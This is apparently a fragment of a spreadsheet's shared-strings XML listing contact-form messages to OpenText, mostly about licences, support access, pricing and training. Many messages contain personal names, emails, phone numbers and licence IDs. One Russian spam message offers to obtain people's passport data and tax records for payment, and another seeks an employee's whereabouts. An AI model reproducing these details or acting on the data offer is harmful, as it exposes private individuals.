Phone:  +49 69 2168-6327 _x000D_
Mobile:  _x000D_
Fax:       +49 69 2168-7263_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone has hacked my account </t>
  </si>
  <si>
    <t xml:space="preserve">Please would you be able to advise how the 'virtual classroom' works for the following course:   _x000D_
26/11/18 - 3-2105 - VIM for SAP Solutions Consultant Bootcamp - English - Netherlands Virtual Classroom - 3500.00 is this GBP?_x000D_
</t>
  </si>
  <si>
    <t>DO you have any office/partner in Pakistan</t>
  </si>
  <si>
    <t xml:space="preserve">Someone hacked my account </t>
  </si>
  <si>
    <t xml:space="preserve">I wanted apply for vacancies on .Net profile. </t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
We are in the planning stages of a proposed upgrade from Windows 7 to Windows 10 Operating System, with the intention of deploying on physical devices and also on a new Virtual Desktop Infrastructure (VDI) solution in select areas of our organisation. _x000D_
In order that we continue to adhere to the licensing terms and any compliance requirements going forward, we would request that you could confirm the following answers to the below question set in relation to the following  Guidanceapplications._x000D_
_x000D_
Guidance_Encase Agent 7_10_1 x 64_R1_x000D_
Guidance Encase Forensiclmager 7_09_x32_R1_x000D_
_x000D_
§	Can you please confirm that there are no compatibility issues or licence constraints or implications moving your application from Windows 7 to Windows 10?_x000D_
If there are, please provide details._x000D_
_x000D_
§	Please confirm if there are any commercial implications associated with moving your application from Windows 7 to Windows 10?_x000D_
If there are, please provide details._x000D_
_x000D_
§	Please confirm if there are any compatibility issues or licence constraints or implications associated with moving your application from a Physical Desktop to a VDI solution?_x000D_
If there are, please provide details._x000D_
_x000D_
§	Please confirm if there are any commercial implications associated with moving your application from a Physical Desktop to a VDI solution?_x000D_
If there are, please provide details._x000D_
_x000D_
§	Can you please confirm if we mask your application on a Windows 10 Physical Desktop and/or within a VDI solution using Appsense, would we require a license for that application?_x000D_
If answer is no, please confirm if there is an alternative masking tool or process that would be acceptable for use on a Windows 10 Physical desktop and/or within a VDI environment?_x000D_
_x000D_
§	Can you confirm if there is a license requirement for your application if it is being specifically used for testing compatibility for use within Windows 10 and/or within a VDI environment? _x000D_
_x000D_
Kind Regards, _x000D_
_x000D_
License Management Team _x000D_
license.management.t</t>
  </si>
  <si>
    <t>Hello, I'm right now working as a system developer in Oracle Forms and Reports 12c and has been assigned to look forward beyond Oracle Forms/Reports. And I found your tool OpenText™ Composer CipherSoft very interesting for migrating to J2EE. It's licensed and I'm wondering how much does the license cost when migrating on my own? Kind regards Nicklas</t>
  </si>
  <si>
    <t xml:space="preserve">We need to convert scanned documents(pdf) to text. so that we can used them for  text searching purpose. Do you have any library or package for that?  </t>
  </si>
  <si>
    <t>am a ugandan and i want to be  GDPR complaint what are the steps to take? thanks for assistance</t>
  </si>
  <si>
    <t>_x000D_
I can't reach the site. my doungle number is G2002077741. I can't download the end version of ENCASE. site gives error.</t>
  </si>
  <si>
    <t>内容zzzzzzzzzzzzzzz</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I work for SoftwareONE’s procurement services and we have been entrusted with the task of collecting the below information from your end._x000D_
_x000D_
One of our customers are about to migrate to Azure,_x000D_
_x000D_
We need to understand whether your software is supported in Azure, specifically Open Text Business Intelligence._x000D_
_x000D_
If it is compatible, we need you to annotate/mark your comments for the below questions:_x000D_
_x000D_
1.	Application with OS (please specify the application name) supported in Azure_x000D_
2.	Supportability (does level/model of support change when migrated to the cloud)_x000D_
3.	Any licensing implications moving to the cloud_x000D_
4.	Functionality in the cloud (remain same or change)_x000D_
_x000D_
In addition, please can you advise which of your application releases are supported in Azure, so we can keep a record if the customer is to upgrade at all,_x000D_
_x000D_
Appreciate your speedy response on the below one._x000D_
</t>
  </si>
  <si>
    <t>BRAVA Pricing for one of the metro projects in India.</t>
  </si>
  <si>
    <t>Need Brava pricing for a customer in India. Very Urgent.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to re-download Brava as I had to start on a clean slate on my laptop. </t>
  </si>
  <si>
    <t>I wish to know about opentext platform costs</t>
  </si>
  <si>
    <t xml:space="preserve">Money </t>
  </si>
  <si>
    <t>Hi, _x000D_
I am looking for a BPM tool and landed on this for one of our client who is into the cloud journey. Can you share me the Case 360 effectiveness over the cloud as of now, i couldnt find any doc as such so far. Any response as soon as you do would be great. Also, I am outside india now for a business trip, kindly reach me on the email and if in case if you want to have a call, I can respond it on my temporary address number._x000D_
_x000D_
thanks in advance</t>
  </si>
  <si>
    <t>We are considering to implement Opentext to extend our ECM for a purpose of handling documents &amp; digital assets. And we would like to know what kind of professional services that you can offer to help us doing the implementation.</t>
  </si>
  <si>
    <t>we need a clear proposal for services you can provide us with</t>
  </si>
  <si>
    <t>OpenText Connect  my user not work they tell to contact you because i do not have permission</t>
  </si>
  <si>
    <t>Hi Team, _x000D_
_x000D_
We purchased several dongles from Guidance software before, now they are part of OpenText, how can I continue to use the support service from the platform? Looks like I do not have the right to download anything. Please advise. _x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards_x000D_
Zoey</t>
  </si>
  <si>
    <t>Was machen Sie eigentlich? Aus allen hier veröffentlichten Info‘s kann man nicht entnehmen, was Sie für Produkte, techn. Lösungen oder Dienstleistungen anbieten, wenn man das Buzzwords-Getue mal außen vorlässt. Also konkret: was ist Ihr Job? Ich schau’s mir mal in 3 Monaten nochmal an - Ihre Chance!</t>
  </si>
  <si>
    <t xml:space="preserve">1. Does open text exstream support JSON format of input and output for restful service?_x000D_
2. In what format we will get response from restful service?. which is the preferable one?_x000D_
can you send me any sample ? request and response of restful service using AUX file and reference file. </t>
  </si>
  <si>
    <t>Looking for open text Training</t>
  </si>
  <si>
    <t>This is a request for pricing for BIRT for IHUB licenses for a State enduser. Please contact as soon as possible.</t>
  </si>
  <si>
    <t>To raise technical support ticket</t>
  </si>
  <si>
    <t xml:space="preserve">Proyecto educativo virtual </t>
  </si>
  <si>
    <t xml:space="preserve">1. I can't create tickets._x000D_
2. I need to create a ticket to understand how to run iHub on a vm in Azure </t>
  </si>
  <si>
    <t xml:space="preserve">Looking a doc composition and CCM solution for VDP projects. I have previous experience with Exstream - interested in a demo for our project team to see if there is a fit. </t>
  </si>
  <si>
    <t>Demo</t>
  </si>
  <si>
    <t>Hello OpenText,_x000D_
_x000D_
I am looking for the two day review course for the System Administrator certification. I can only find 5 days bootcamp._x000D_
_x000D_
Thank you,_x000D_
Amy</t>
  </si>
  <si>
    <t>Grateful if you could let me know the name of training courses available for Encase Forensic in UK and the cost in British currency.</t>
  </si>
  <si>
    <t>Hi! Before I can advance discussions on Encase with a client of mine, I need to understand whether it will operate correctly in a ZScaler Private Access (ZPA) deployment. I'm hearing of potential conflicts due to client - Server versus server out design. Can you provide any insight please?</t>
  </si>
  <si>
    <t>I should have access to the support area of the web site, but for some reason I am getting blocked. I need to research a problem I am experiencing with the Exceed product.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for PC/Mobile Device digital forensics tool.  Please call ASAP._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, I am inquiring whether OpenText has an inside venture capital type of organization, to invest in potential strategic young companies. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I love you </t>
  </si>
  <si>
    <t>can't login into Talent central - Success Factors</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
Je suis Consultant Business Solution au sein d’Atos._x000D_
Je vous contacte car je travaille actuellement sur plusieurs études DAM (Digital Asset Management) pour certains de nos clients Français. _x000D_
_x000D_
Les études que nous menons consistent à :_x000D_
-	recueillir les besoins utilisateurs de nos clients, _x000D_
-	puis élaborer une grille d’analyse avec des critères précis,_x000D_
-	afin de benchmarker quelques solutions DAM du marché. _x000D_
_x000D_
L’objectif de ces études est de permettre à nos clients d’identifier LA solution idéale selon leur besoin._x000D_
_x000D_
Dans cette optique, j’aimerai échanger avec vous sur votre solution DAM. _x000D_
A quel moment pourrions-nous avoir un premier contact téléphonique ?  _x000D_
--_x000D_
Cordialement,_x000D_
 --_x000D_
Wilfried JAMIN_x000D_
Business &amp; Platform Solutions_x000D_
Consultant_x000D_
T +33 (0)4 89 39 00 80_x000D_
wilfried.jamin@atos.net_x000D_
_x000D_
Le Millénium - 150 allée Pierre Ziller_x000D_
06905 Sophia Antipolis – France_x000D_
</t>
  </si>
  <si>
    <t>Cannot get cofirmation email and cannot find download for Faxutil or rightfax client</t>
  </si>
  <si>
    <t>Unable to access my My support  after changing my address from amit.verma@hovservices.com to  amit.verma@exelaonline.com. It taking me to confirmation email and even though I confirm email its still not allowing me the second time. I have thried confirming email many time but goes nowhere</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir haben bei uns SuccessFactors im HR im Einsatz und sind nun auf der Suche nach einer integrierbaren Lösung für eine digitale Personalakte. Lt. meinem Kenntnisstand bieten Sie eine solche Lösung an. _x000D_
_x000D_
Können Sie mir weitere Informationen diesbzgl. zukommen lassen?_x000D_
_x000D_
Mfg_x000D_
Jens Fehl</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Greetings for the day._x000D_
_x000D_
My name is Ujjwal Chaudhary, and I’m contacting you on behalf of Infiniti Research, a sourcing advisory firm. _x000D_
_x000D_
We are currently conducting a supplier evaluation study (for a leading pharmaceutical company) to identify eDiscovery solution providers._x000D_
_x000D_
We would need to understand the service capabilities of your company and ensure they are well aligned with our clients’ requirements._x000D_
_x000D_
Could you please share the following:	Respondent’s remark _x000D_
1	Use cases (Pharma or any other regulated industry)	_x000D_
2	Clientele 	_x000D_
3	Unique service capabilities (that stands out among competitors)	_x000D_
_x000D_
In relation to that, we would like to have a discussion with you to understand your portfolio, capabilities, and strategic value chain tie-ups. _x000D_
_x000D_
The information that you provide would be documented and shared with our client to help them understand supplier capabilities existing in the market._x000D_
_x000D_
Please share the details by 13th November 2018, end of business day. We will collate the information and share it with our client for further evaluation._x000D_
_x000D_
We thank you for your time and consideration. _x000D_
_x000D_
Regards,_x000D_
Ujjwal Chaudhary_x000D_
Procurement Consultant | Infiniti Research_x000D_
+91 7899643425</t>
  </si>
  <si>
    <t xml:space="preserve">Price quote.  The need for a secure (HIPAA compliant) fax solution.  Our volume is 3000+ pages a month. </t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are supporting for AHOLD client, currently we are running the product PRODUCT(Open Text Data Integrator) with version 4.4.1.. Can you please confirm us whether the product is compatible with zOS 2.3, z14 hardware machine and CICS 5.3 level(If applicable).? or do we need to apply any maintenance.? Thanks..!!_x000D_
_x000D_
Thanks,_x000D_
Vinitha Nityanandam</t>
  </si>
  <si>
    <t>Hi_x000D_
I would like to know, how can I send a doubt about Encase, Previously I had Support by Guidance. Here in EY Brazil, we have many licenses of Encase._x000D_
_x000D_
Best Regards_x000D_
Felipe S. Lazzaro</t>
  </si>
  <si>
    <t>Quote for Fax Server or Cloud Solutions</t>
  </si>
  <si>
    <t>I am working for Unisys, a partner from OpenText. I would like to connect my knowledge center account to the Unisys Partner account so I can benefit from the partner agreement. how do I do this?</t>
  </si>
  <si>
    <t>Dear Executive,_x000D_
I would like to get access for My support page under Nokia account. Can you please provide me access on required.</t>
  </si>
  <si>
    <t>I need a Quote for -OpenText Content Server 10, CS 10.5 and CS16</t>
  </si>
  <si>
    <t>Mitglied</t>
  </si>
  <si>
    <t xml:space="preserve">Ich cannot download my EnCase licenses! Everytime I try to log in to "MySupport", I get a screen saying that I have to request a confirmation E-Mail first. I've already got 3 confirmation e-mails and I still cannot log in to download my licenses!_x000D_
Thank you for your help! With kind regards._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I used to have access to Opentext support._x000D_
I created ticket in the past but today I try to check one previous ticket and I can't._x000D_
In the same way I tried to open a new ticket but without success, I get on a page "No Access"._x000D_
For your information I have access to Opentext support in July 2018 (ticket 3400817) but today it doesn't work._x000D_
_x000D_
We have support with Infor, we pay for Infor support and with this we should also have Opentext support. (both are linked from my understanding)_x000D_
_x000D_
Can you please tell me what changed since we don't have access to Opentext support anymore._x000D_
_x000D_
Thanks,_x000D_
Borivoje MUTAVDZIC</t>
  </si>
  <si>
    <t xml:space="preserve">ATTENTION: OpenText Philippines Inc. .Dear Sir/Ma'am:   Greetings! Reference No.204174 :  We have been trying to get in touch with  AGUILA KRISTINE HAZEL ADAO   through his last known contact details and address in our records however much to our dismay, we have not been successful in this endeavor.   We have recently received information that said person is presently employed with your good office. We hope to communicate with him on an urgent and confidential matter requiring his immediate attention.   In this regard, we would be most grateful if your office could advise us on any relevant information such as his current whereabouts and/or contact numbers which may help us re-establish communication with said person.   We may be contacted at (02) 918-2828 Loc.188 ,or 0915-791-7267 , 0947-308-9332.   Please acknowledge receipt hereof by sending a reply e-mail. Thank you and Have nice day!  </t>
  </si>
  <si>
    <t>Need access to Documentum Knowledge base</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(495) 248-01-88 Виктор</t>
  </si>
  <si>
    <t>DM</t>
  </si>
  <si>
    <t>New member in IT. Need support access to file cases. I can give whatever approval required from IT Management</t>
  </si>
  <si>
    <t>Would like to know if Opentext Australia sells Fastman Permission Manager for Content Server.</t>
  </si>
  <si>
    <t>I was supposed to have an inbound/outbound fax number. Only the outbound is working. I called the help dask &amp; they opened ticket  # 1-346-331-5093._x000D_
Please fix for bidirectional faxing.</t>
  </si>
  <si>
    <t>I just upgraded to Mojave on my mac (first new computer in 6.5 years!) I use firstclass at school. Works great. I was told that "32 bit encryption" doesn't work with Mojave. My first class on my computer stopped working. I HATE using the online first class - it is cumbersome and doesn't show my documents. I suspect as more and more people upgrade this will affect many more people. Is First Class planning to fix this problem? Many thanks.</t>
  </si>
  <si>
    <t>I cannot login to my support. I get the error "No Access_x000D_
We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t xml:space="preserve">buenas tarde le escribo para informarles que mantengo inconveniente para validar las licencias me sale un mensaje de que la cuenta no ha sido verificada, envio el correo de verificiacion valido la cuenta y me sale el error, me urge verificar las licencia que se mantiene dentro de nuestra seccion. </t>
  </si>
  <si>
    <t>Fax users 18338548522 - mleardo@domaincapitalgroup.com and 18338548514 - _x000D_
MCassady@DomainCapitalAdvisors.com are unable to send faxes. No bounceback or errors. They can receive faxes._x000D_
_x000D_
We have already attempted creating a new hairpin number. No change.</t>
  </si>
  <si>
    <t>BL</t>
  </si>
  <si>
    <t>Dear Sir or Madan,_x000D_
_x000D_
_x000D_
we are German Company who trade with car parts and specially with Osram Bulbs we trade fully Osram Automotive Catalog and search for new whole seller who can sale us large quantities in reasonable price._x000D_
Our orders are by 30.000-50.000 €   If you can give us good price and interested on long term cooperation so please contact us by our Email specially for whole seller. Thanks and sorry for disturb you</t>
  </si>
  <si>
    <t>Please send me Invoice copy #3000119652._x000D_
Thank you,</t>
  </si>
  <si>
    <t xml:space="preserve"> I was looking at the DF120 class. I observed some classes that say Virtual Classroom, but location says On-Site. Is the virtual classroom something I can attend online from my office?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
I am looking for some help with a verification of employment for one of your employees. Can you please provide a contact email or phone number for an individual in human resources or payroll who can help me complete the verification?_x000D_
</t>
  </si>
  <si>
    <t>Requesting quote for Open Text Fax software to load on 1 desktop.</t>
  </si>
  <si>
    <t>We are a managed services company that has, as one its clients, Allen County, OH.  One of our departments is using Redact-IT Desktop and I need to check to see if any of our licenses can be freed up for use on a new computer.  The PINS and Software IDs are listed below.  Thank you for any assistance you can provide._x000D_
_x000D_
PIN: 380373      Software ID: QDS0CA00JD1X_x000D_
PIN: 380374      Software ID: QDS0CA00JD1Z_x000D_
PIN: 380375      Software ID: QDS0CA00JD21_x000D_
PIN: 380376      Software ID: QDS0CA00JD23_x000D_
PIN: 380377      Software ID: QDS0CA00JD25</t>
  </si>
  <si>
    <t xml:space="preserve">Quiterian Analytics Platform- </t>
  </si>
  <si>
    <t>I need to find our what our AS2 Identifier number is for one of our clients (Ace Hardware) for EDI purposes.  Can you please contact me right away?_x000D_
Thank you,_x000D_
Kim Wentzel_x000D_
602-278-6703 x 2019_x000D_
kwentzel@gro-well.com</t>
  </si>
  <si>
    <t>How do I send a verification of employment form over to be filled out for an employee who has been there just a year?</t>
  </si>
  <si>
    <t xml:space="preserve">My team and I at AbbVie are currently in the process of evaluating different content management solutions for our Regulatory, R&amp;D Quality, and Safety group to better manage and process large amounts of content within our Quality Safety Documents (QSD). We would like to send a RFI to gather more information regarding OpenText Cloud. _x000D_
_x000D_
Please feel free to contact me at 614-390-5231 or seung.jun@abbvie.com, so I could send the RFI. </t>
  </si>
  <si>
    <t>Looking for an on prep web based secure file transfer solution.</t>
  </si>
  <si>
    <t>We don't know who our account manager is, or would be, at OpenText as it changed over the years and we've lost contact with that kind of connection.  We need to discuss transferring our MBPM account to OpenText directly instead of through Thomson-Elite.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello:_x000D_
_x000D_
My name is Erica Rowell-Sakuma. I was wondering if your business sponsored teams in any capacity? My two children, one 7 y/o (plays U8) and one 11 y/o (plays U12 Rep) play Ringette for Kitchener and they are looking for sponsorship for their teams.  I can send you two letters, one for the U8 team and one for the U12 Rep team, for you to look at if you are interested.  If you have any questions or concerns please let me know and I will direct you to those people that can answers these for you._x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Erica Rowell-Sakuma </t>
  </si>
  <si>
    <t>Looking to introduce myself to our OpenText Account Manager.  We also may have some future opportunities with OpenText and would like to get some additional information.</t>
  </si>
  <si>
    <t>want to know how am I going to update my Magellan GPS &amp; Dash Cam.  It looks you guys bought magellan, true?</t>
  </si>
  <si>
    <t>Looking for information on the VIM solution for SAP.</t>
  </si>
  <si>
    <t xml:space="preserve">I was going through the W9 and noticed that we do not show a W9 on file for Xpedite Systems  LLC  company can you please send us a copy of your W9 so we can have it for our records_x000D_
_x000D_
Please send it to apmail@helzberg.com._x000D_
_x000D_
Thank You Deborah Mitchell._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi team,_x000D_
_x000D_
I am working as Salesforce Architect on an Axa project and we will need to use your connector to integrate Documentum (now OpenText) in our Salesforce._x000D_
_x000D_
Are you available for a call to start the preliminary and deep dive about prerequisites and limits ?_x000D_
_x000D_
Many thanks and best regards,</t>
  </si>
  <si>
    <t xml:space="preserve">DMS Lösung mit dem Schwerpunkt Immobilie und Referenzkunden </t>
  </si>
  <si>
    <t>Please contact me. I would like to have a demo of the VIM and ICC OpenText options for capturing about 25,000 invoices per year for Buckman North America. _x000D_
Thanks,_x000D_
Shawn Cobb</t>
  </si>
  <si>
    <t>Hello,   Could you email me back and let me know where your GSI training facilities are located in Pasadena, CA and in Washington DC?  I am trying to figure out which one would be the best for me to take training at, but I want to make sure I am looking at the right locations.  Just the addresses would be fine, but if you have recommendations on lodging that would be beneficial as well._x000D_
Kind regards,_x000D_
Chad</t>
  </si>
  <si>
    <t>Can't get ahold of our sales rep Nicole Calbrough - need a new contact</t>
  </si>
  <si>
    <t>Bonjour, Pierre Aussure aimerait contacter Marie-Calire Unal, pourriez-vous m'envoyer une adresse email svp? cordialement, Dee O'Donnell</t>
  </si>
  <si>
    <t>Can you help with my account?  CGI is a partner, yet i don't have access to downloads.  thank you.</t>
  </si>
  <si>
    <t>Hi, we are interested in buying an Encase discovery  perpetual license for one user._x000D_
Do you need to know the end user in order to send us a quote?</t>
  </si>
  <si>
    <t>I bought a tableau td3 (new)._x000D_
I have problems with the SD card. When i swicht on the TD3 in the display i have a message "v1 Error Failed to read SD Card" and the device is stopped._x000D_
The SD Card looks ok but formated._x000D_
_x000D_
How i can recover the original firmware to SD CARD?_x000D_
_x000D_
It's urgent. _x000D_
Thank you._x000D_
_x000D_
Juan Arce</t>
  </si>
  <si>
    <t>Contract management solution replacement.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am contacting you  in regards to my account. I submitted a form to cancel my account online months ago. I wanted to make sure that it went through because I am still getting statements  _x000D_
_x000D_
My company: VISION ELECTRONICS, INC _x000D_
CUSTOMER NUMBER: 0000000064664      _x000D_
Primary email: vemisc@visionelectronics.com _x000D_
_x000D_
_x000D_
Thank you _x000D_
Andres Velasquez </t>
  </si>
  <si>
    <t>We are looking for software that handles CRM, Project Management, Catalog Business Sales and Production, Equipment Dealership Sales Tracking, and Manufacturing Tracking of the items we produce in-house. We essentially have three different businesses in the food service equipment industry. We are looking for an efficient way to have information managed through the sales and production process._x000D_
_x000D_
Thanks for your help. --Lee Bernard 331-256-6119</t>
  </si>
  <si>
    <t>The company is interested on Exstream software solution-</t>
  </si>
  <si>
    <t>Hello,_x000D_
I forgot the password, I tried to reset the password but it doesn't work._x000D_
Can you help to access to Opentext support tool.</t>
  </si>
  <si>
    <t>BASS Systems, leading Moldovan IT Systems Integrator and Solution Provider, has an opp-ty in Public Sector with 2000+ users for the implementation of an Electronic Document Management System and e-Archive Solution. We would like to discuss the possibilities of using OpenText solutions for this purposes. Thank you!</t>
  </si>
  <si>
    <t>I would like to present RightFax to potential End Users.  I would like a ppt presentation of how to use RightFax (no server configuration or what makes it tick).  The audience is not technical but are common pc users that need to be sold on the simplicity of using RightFax and (hopefully) dumping their everbreaking fax machines.</t>
  </si>
  <si>
    <t>We are still using an old Actuate v8 solution running on a Windows Server 2000 environment, but see an opportunity to make an upgrade to a more recent version of this solution in the coming period._x000D_
_x000D_
Would you be able to indicate which are the latest version(s) of the Actuate/OpenText solution for a potential migration? Maybe you already have knowledge of any compatibility concerns we should take into account for Actuate v8?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
On behalf of our client, Kinapse is pleased to invite your company to respond to a Request for Information (RfI) for a Regulatory technology transformation initiative. The purpose of this RfI will be to gather information on your RIM systems and process automation capabilities and their ability to meet the strategic requirements of our client. _x000D_
_x000D_
In order for us to send this RfI, please could you provide us with the legal entity that you wish to be contacted as during the process (including full registered company name and registered address)? Please provide this information to us as soon as possible, so that we can send you an NDA to review and sign. Note that we will not be able to send the RfI to you until this is completed._x000D_
_x000D_
Please send any questions to dominic.faulkner@kinapse.com. _x000D_
_x000D_
We look forward to hearing from you soon._x000D_
_x000D_
_x000D_
Dominic Faulkner_x000D_
_x000D_
Analyst, Advisory Services_x000D_
Kinapse_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We need to access to OpenText download portal in order to download the latest version of EnCase._x000D_
_x000D_
As we've not do this change since OpenText bought Guidance, all our old credentials are not known anymore._x000D_
_x000D_
I don't know what is the Licence contract, but if it can help you, we have the following encase licenses: X100008076254, X100008076171_x000D_
_x000D_
Can you please contact us rapidly, this is an urgent request._x000D_
_x000D_
Regards,_x000D_
Florian Cossard</t>
  </si>
  <si>
    <t>Check it</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
I am not sure I have come through to the right team regarding my query but I was recommended this email by a colleague of yours and  hoping you could help._x000D_
_x000D_
We require the license details initially provided to St. Georges as we need to reinstall Captiva on one of the PC’s which is currently down._x000D_
_x000D_
Are you able to provide me with this this information?_x000D_
_x000D_
Thank you_x000D_
Asma_x000D_
_x000D_
_x000D_
Senior Team Leader for Health Records_x000D_
Outpatient Services_x000D_
St George's University Hospitals NHS Foundation Trust_x000D_
</t>
  </si>
  <si>
    <t>I'm having issues trying to register the EnCase support forums. I have successfully registered a general OpenText account and I'm stuck in a loop where I get a message on the website that I need to confirm my account by clicking on the hyperlink provided. However, I've confirmed the account several times but I still come back to that message. Ultimately I would like to register my EnCase dongle and get access to the support forums._x000D_
Thank you,_x000D_
Gary Evans</t>
  </si>
  <si>
    <t>PMC workflow automation</t>
  </si>
  <si>
    <t>Hi, This is Rafait Ullah form Aspire tech Services and Solutions Limited, Bangladesh. We are a services and Solutions oriented company who worked for Government Agency, Law enforcement, Bank &amp; others Industry for Their Cyber Security and Computer Forensic solutions. we are having some upcoming project on Incident Response (IR) right now we are searching best solution for our client as per our research i think encase in one of the best product, but to know more about your product if you guys can help me it will be best for us rather than search online about product._x000D_
_x000D_
Regards,_x000D_
Rafait Ullah</t>
  </si>
  <si>
    <t>Добрый день ! _x000D_
Хочу предложить свою помощь в получении учредительных документов ( Устав , свидетельство о постановке на учёт ( ИНН ) лист записи,(ОГРН) . Так же наличии недвижимости ,паспортные данные , автомобиля у физ лица. Паспортные данные  ген директоров и учредителей. СНИЛС и ИНН  узнать номер ,регистрация и восстановление без присутвия. _x000D_
Цена зависит от объема и срока получения . _x000D_
 _x000D_
1-2 дня _x000D_
2000 устав _x000D_
3000 лист записи _x000D_
5000 свидетельство  (Весь комплект  могу отдать за 9 000) _x000D_
 _x000D_
3-4 дня _x000D_
2000 устав _x000D_
2500 лист записи _x000D_
4000 свидетельство (Весь комплект  могу отдать за 7 000) _x000D_
 _x000D_
5-7 дней _x000D_
1500 устав _x000D_
1500 лист записи _x000D_
2000 свидетельство  (Весь комплект  могу отдать за 5 000) _x000D_
 _x000D_
Все документы получаемые мной  официальные ,получения производиться только через  ИФНС ,Россреестр. _x000D_
Работаю на прямую с налоговой без посредников , цены могут быть чуть ниже в зависимости от объема заказанных услуг .Буду  рад сотрудничеству с Вами, спасибо за внимание, хорошего Вам дня. _x000D_
8 966 081 92 46 Игорь _x000D_
igor.vipiski@gmail.com</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I am Alyssa,_x000D_
 _x000D_
Would you prefer exploring new markets for your business using our newly updated Customer Relationship Management? It will help in enhancing your sales as we provide you with verified direct contact details and mail ids._x000D_
_x000D_
Target Titles:_x000D_
_x000D_
•	Licensed Clinical Psychologists_x000D_
•	Physical Therapists/Physicians_x000D_
•	Caregivers/Counselors_x000D_
•	Nurse Practitioners_x000D_
•	Clinical/Nurse Case Manager_x000D_
•	Care Managers_x000D_
•	Hospices Care Providers_x000D_
•	Providers of Non-Medical Personal Care Service_x000D_
•	Health Care Professionals_x000D_
•	Interdisciplinary Professional_x000D_
•	Assistant Director of Nursing_x000D_
•	Nursing Home Administrator_x000D_
•	Insurance Providers/Consultants_x000D_
•	Others Allied to this Field_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	Private Duty/Home Care Aide Organizations_x000D_
•	Certified and Licensed Home Health Agencies_x000D_
•	Suppliers of Products_x000D_
•	Computer Companies/Consulting Firms_x000D_
•	Medical Equipment Suppliers and Many More_x000D_
_x000D_
We do provide few samples if you wish to cross check the Quality of our data._x000D_
_x000D_
If yes, then would you be interested in using our database which can help you in reaching Active List/Buyers List/Contacts List:_x000D_
_x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
_x000D_
List Details:_x000D_
	Format: Excel spreadsheet._x000D_
	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
_x000D_
You can fill in your exact Target criteria in the below mentioned format:_x000D_
_x000D_
Target Job Titles: _________ Target Industry: ______________   Target Geography: ______________x000D_
 _x000D_
I will get back to you with Data counts, Cost and Benefits._x000D_
 _x000D_
Thanks and Warm Regards,_x000D_
 _x000D_
Alyssa Maxwell_x000D_
Marketing Executive_x000D_
Business to Business| E-mail and Data Appending Services| USA/Canada_x000D_
12840 NE 21st Place, Bellevue, WA 98005, United States_x000D_
E-mail: maxwell.alyssa@aol.com _x000D_
______</t>
  </si>
  <si>
    <t>I am emailing in regards to the Finance Operations Coordinator job posting at OpenText's Waterloo location. I will be working for CGI Group as a Project Control Officer in the Global Wealth division until September 2019. I was wondering who to email for more information about the Finance Operations Coordinator job once September comes. _x000D_
_x000D_
Thank you, _x000D_
Daniel Ganev</t>
  </si>
  <si>
    <t>I would like you to client for me. I work for Atos and support Western Power in Perth. Would it be possible to add Western Power to the list of customer/client which I can raise tickets for. Thanks.</t>
  </si>
  <si>
    <t>I require access to Open Text Knowledge Centre and would like to mirror my account after my supervisors. I accidentally entered the wrong email while signing up so could not get access..... the account I need to mirror to is Philip.a.chan@accenture.com</t>
  </si>
  <si>
    <t>I’m trying to setup a meeting on your Brava desktop viewer with my client Sharecare. If possible we can set up something this week. Thanks!</t>
  </si>
  <si>
    <t>Is there a version of eDOCS that supports Windows Server 2019?  And if not yet, is there an ETA on when this will be supported?</t>
  </si>
  <si>
    <t>I am trying to update a page on my company intranet and am unable to. If someone could please reach out to me to assist with this that would be appreciated. My email is Vanessa.bennett@rbc.com and my phone number is 416-272-9451._x000D_
_x000D_
Thanks,_x000D_
Vanessa</t>
  </si>
  <si>
    <t>Hello,_x000D_
Your offering sounds very impressive. I am interested in learning if you offer any services that execute the scanning work.  We are a small company with only one project to be scanned and ideally I'm looking for a vendor who could process that work.  _x000D_
Thanks,_x000D_
Lynn</t>
  </si>
  <si>
    <t>I've been asked to look into Automated Invoice Processing systems and would like to ask you a few questions about your Vendor Invoice Management system.</t>
  </si>
  <si>
    <t>I'm trying to get to our renewal form, but when I put in the URL I get the error that I do have access.  It also says that Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.  If also has a link to Request confirmation email.  I clicked on it and got the email from Opentext.  I also clicked on the link in there to Confirm Registration.  Could you please set my account to all access in regards to our OpenText account?  Thank you</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
My name is Seung Jun, and my team and I are currently in the process of evaluating different content management solutions to better manage and process large amounts of content within our Quality Safety Documents (QSD). We would like to send a RFI to gather more information regarding OpenText Cloud. Unfortunately, we are on a tight deadline and would appreciate a quick response. _x000D_
_x000D_
Please feel free to reach out to me at 614-390-5231 or seung.jun@abbvie.com._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Seung Jun</t>
  </si>
